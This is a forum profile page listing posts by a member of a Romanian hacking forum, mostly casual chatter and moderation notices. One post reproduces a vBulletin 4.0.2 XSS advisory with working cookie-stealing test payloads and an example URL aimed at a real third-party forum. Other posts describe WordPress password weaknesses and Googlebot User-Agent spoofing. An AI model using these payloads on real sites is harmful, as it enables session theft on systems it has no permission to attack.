Jump to content

begood

Active Members
  • Posts

    3972
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by begood

  1. de unde ai mai b??it-o ?i pî asta?
  2. cred ca universul e fractal. so no particula a lu' Dzeu ala.
  3. pe pornbits nu gasesti materiale pentru pedofili
  4. This list is updated daily: http://s3.amazonaws.com/alexa-static/top-1m.csv.zip .. and useful in so many ways... ;-) Extracted link from: Alexa Top 500 Global Sites (top right)
  5. facebook chiar e cel mai stilat. acolo sa tot lucrezi. google pe de alta parte nu-mi inspira decat lipsa de imaginatie.
  6. intra pe forumurile de porn de pe freenet. fms forums, e PLIN acolo cu zecile de GB.
  7. Extracting_Database_Information_By_DDragen.part1.rar - C?utare Google how about ban for spam ? 1 week should do it.
  8. The User-Agent field is used by various websites to identify when web crawlers such as Google's Googlebot and Yahoo!'s Slurp, visits their website. Interestingly, many webmasters naively use this to open up protected pages on their website (otherwise not visible without e.g. logging into the website) to Google, so it may mine and list those pages in its web search. Unfortunately, as the User-Agent can be easily modified, this form of authenticating provides almost no protection against spoofing attacks! In this video we will see how one can trivially change the User-agent string in Firefox and emulate Googlebot or any other web crawler's User-Agent string. The websites used in the below video are listed in the Links section below. Changing your Firefox User Agent to Emulate Googlebot Tutorial
  9. daca au gasit vulnerabilitate in vmware, m-as indoi sa nu gaseasca si aici.
  10. chiar te rog, ma fascineaza //cred ca a ajutat si faptul ca am scris cu pixul/creionul/carioca pe peretele de langa pat toate astea xD (pi -> 1000 zecimale, sqrt(2) -> 1000, sqrt(5) -> 100, etc ) ma fascineaza si numerele in baza 2, dar nu m-am pus sa le retin. sa nu uit un detaliu esential : fetele is fascinate de toate astea si vor sex nebun dupa ce imi admira peretele xD
  11. 3.1415926535897932384626433832795028841971693993751058209749 3.141 592 653 58 astea le-am retinut primele, nu mai stiu de unde, cum. descompun intai zecimalele in grupuri de cate 3/4/5 si incerc sa le retin facand paralele cu numere prime/ compuse din 2 numere prime (produs de 2 numere prime), daca se repeta o anumita chestie gen 999 sau 123, permutari de numere... odata ce am reusit sa retin o bucata sa zicem de 20 zecimale, faceam aceeasi chestie de mai sus, doar ca in alta ordine, "puneam spatiu" dupa un alt numar de zecimale si le retineam in alta ordine. asta ajuta enorm daca chiar se intampla sa uit un grup. nu le vad ca pe niste imagini, mai mult ca pe niste "sentimente" ... fiecare numar induce o anumita "micro" stare, un sentiment ce dureaza foarte putin. poti compara ce experimentez eu cu o imagine ce-ti apare pentru o fractiune de secunda cand inchizi ochii si te gandesti la ceva/cineva anume. doar ca nu e poza.
  12. multumesc. btw eu pot recita primele 200 zecimalele lui pi si a lui sqrt(2) de pe la 13 ani si primele 1000 numere prime :] no bullshit. ps: e imposibil sa nu gasesti un pattern odata ce le-ai retinut.
  13. multi ani !
  14. begood

    Fun stuff

  15. User : Marian Ban 1 sapt pentru http://rstcenter.com/forum/cereri-numai-aici/21347-salut-caut-un-sms-bomber-3.html#post137525 Motiv : a editat sursa sms-bomber-ului scrisa de benny_loppa, nu a precizat asta si si-a asumat toate creditele. User : remuszica Ban 1 an, numai threaduri de cacat deschide. 10.05.2010 ionutzel,StrXt,Bebe1911,bughy sunt una si aceeasi persoana.(verificat personal). A incercat sa distribuie mai multe versiuni de trojan FUD pe forum (verificat personal), a folosit mai multe conturi pentru a nu bate la ochi, a postat ca programul e bun, merge pentru a induce in eroare userii. Pentru asta are ban 3 luni pe toate conturile, fara drept de apel. PA si PUSI.
  16. 2shared - download dsc06579.jpg
  17. update to 1.5 CAINE Live CD - Shining computer forensics digital forensics
  18. bravo, esti foarte aproape ! ps: cine crezi ca a facut acel topic pe frt ?
  19. NEW HINTS : 1.mask; *e**o**s; 2.drum, eroare, slujba gogogo
  20. eu zic ca a clacat exact din cauza ca era la 3 facultati.
  21. Earlier in 2008 I wrote about Brute Force vulnerability in WordPress , which Kad was discovered back in 2007. As I recently checked in WordPress 2.9.2 This vulnerability has not been fixed. And I also discovered new vulnerabilities in WP. In March, 02/03/2010, I found Brute Force and Insufficient Authorization vulnerabilities in WordPress. Brute Force: Brute Force: In security features pages / records no password protection password selection (from Brute Force attacks). Insufficient Authorization: On each page / post in WP, you can put a password and these passwords are identical. But access to the password feature saves global Cookies working immediately for the entire site. Thus, specifying a password for every single page and write, you can see all zaparoleni Pages / record (with the same password, even without knowing the password matches), because if you ask them, access is automatically granted. In this case there are two side effects: 1. In the case when there are multiple pages with one password (for example, a separate section of a site), this functionality will be easy, because you can enter the password once and get access to all pages at once with this password. 2. In case you have different pages with different passwords, it will lead to discomfort when it recorded only the last password to other pages (with another password) protribno will always enter the password. Vulnerable WordPress 2.9.2 and previous versions (all 2.x versions). Checked in different versions of WP, in particular in 2.0.11 and 2.9.2. Google Translate
  22. ================================= Vbulletin 4.0.2 XSS Vulnerability ================================= [+] Vbulletin 4.0.2 XSS Vulnerability 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm 5ubzer0 member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 [+] Discovered By: 5ubzer0 [+] My id : http://inj3ct0r.com/author/2307 [+] Original : http://inj3ct0r.com/exploits/9697 # Version: Vbulletin 4.0.2 www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script> www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script> Exemple: [url=http://www.forumjogosonline.com.br/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E]Pesquisar nos Fóruns - Fórum Jogos Online[/url] # Inj3ct0r.com [2010-03-19]
  23. mult mai lunga. pun pariu ca nu o sparge nimeni...
  24. auzi, macar gandeste apoi comenteaza. macar andrew si-a dat seama de metoda. apropo, adminii si moderatorii sunt invitati sa isi bage coada.
  25. va dau un hint : calculati intai numarul de parole ce vor fi incercate in acea perioada scrisa de mine. de acolo e matematica si gandire. @ICEBREAKER101010 nu merge cu rainbow tables. am facut in asa fel incat sa nu se poata (e prea lunga parola)
×
×
  • Create New...